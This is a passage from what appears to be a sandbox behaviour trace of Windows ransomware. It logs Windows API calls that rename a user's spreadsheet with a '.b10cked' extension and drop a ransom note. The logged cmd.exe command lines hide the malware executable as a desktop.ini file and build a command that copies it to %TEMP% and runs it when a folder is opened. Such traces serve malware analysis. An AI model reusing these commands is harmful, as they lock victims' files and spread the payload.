lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x45a7 [0127.631] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4a8f [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4a8f [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0127.633] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2546, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2546, lpOverlapped=0x0) returned 1 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0127.633] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2546, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2546, lpOverlapped=0x0) returned 1 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=-9542, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2549 [0127.633] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2546, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2546, lpOverlapped=0x0) returned 1 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=-9542, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2549 [0127.633] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2546, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2546, lpOverlapped=0x0) returned 1 [0127.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS0-Nm2046.xlsx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0127.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS0-Nm2046.xlsx", cchWideChar=15, lpMultiByteStr=0x131326c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS0-Nm2046.xlsx", lpUsedDefaultChar=0x0) returned 15 [0127.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4a8f [0127.638] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0127.638] CloseHandle (hObject=0x114) returned 1 [0127.639] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\BS0-Nm2046.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS") returned 0x48 [0127.639] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0127.640] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x508, dwThreadId=0x82c)) returned 1 [0127.650] CloseHandle (hObject=0x110) returned 1 [0127.650] CloseHandle (hObject=0x114) returned 1 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", cchLength=0x2b | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\") returned 0x2b [0127.650] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\", cchCount2=43) returned 3 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0127.650] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0127.650] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0127.651] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0127.651] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0127.651] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0127.652] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0127.652] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0127.652] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x83c, dwThreadId=0x84c)) returned 1 [0127.664] CloseHandle (hObject=0x110) returned 1 [0127.664] CloseHandle (hObject=0x114) returned 1 [0127.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0xffffffff [0127.664] GetLastError () returned 0x2 [0127.664] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0127.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0127.666] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.666] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0127.666] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0127.667] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.667] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0127.667] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0127.667] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0127.667] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0127.667] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0127.667] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0127.667] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1") returned 0x3b [0127.668] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x1aa | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x1aa [0127.668] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0127.668] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x87c, dwThreadId=0x8a4)) returned 1 [0127.673] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0128.391] CloseHandle (hObject=0x114) returned 1 [0128.391] CloseHandle (hObject=0x110) returned 1 [0128.391] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0128.391] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0128.391] GetTickCount () returned 0x2926f [0128.391] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18518033491) returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x64\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.391] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0128.392] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0128.392] CharUpperBuffW (in: lpsz="explorer.exe \"1VhPwYxy0yNVr kbAeh\" & type \"1VhPwYxy0yNVr kbAeh\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x77 | out: lpsz="EXPLORER.EXE \"1VHPWYXY0YNVR KBAEH\" & TYPE \"1VHPWYXY0YNVR KBAEH\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x77 [0128.392] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0128.392] CharUpperBuffW (in: lpsz="explorer.exe \"1VhPwYxy0yNVr kbAeh\" & type \"1VhPwYxy0yNVr kbAeh\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x78 | out: lpsz="EXPLORER.EXE \"1VHPWYXY0YNVR KBAEH\" & TYPE \"1VHPWYXY0YNVR KBAEH\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x78 [0128.392] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0128.392] CoInitialize (pvReserved=0x0) returned 0x0 [0128.392] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0128.393] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0128.394] ShellLink:IUnknown:QueryInterface (in: 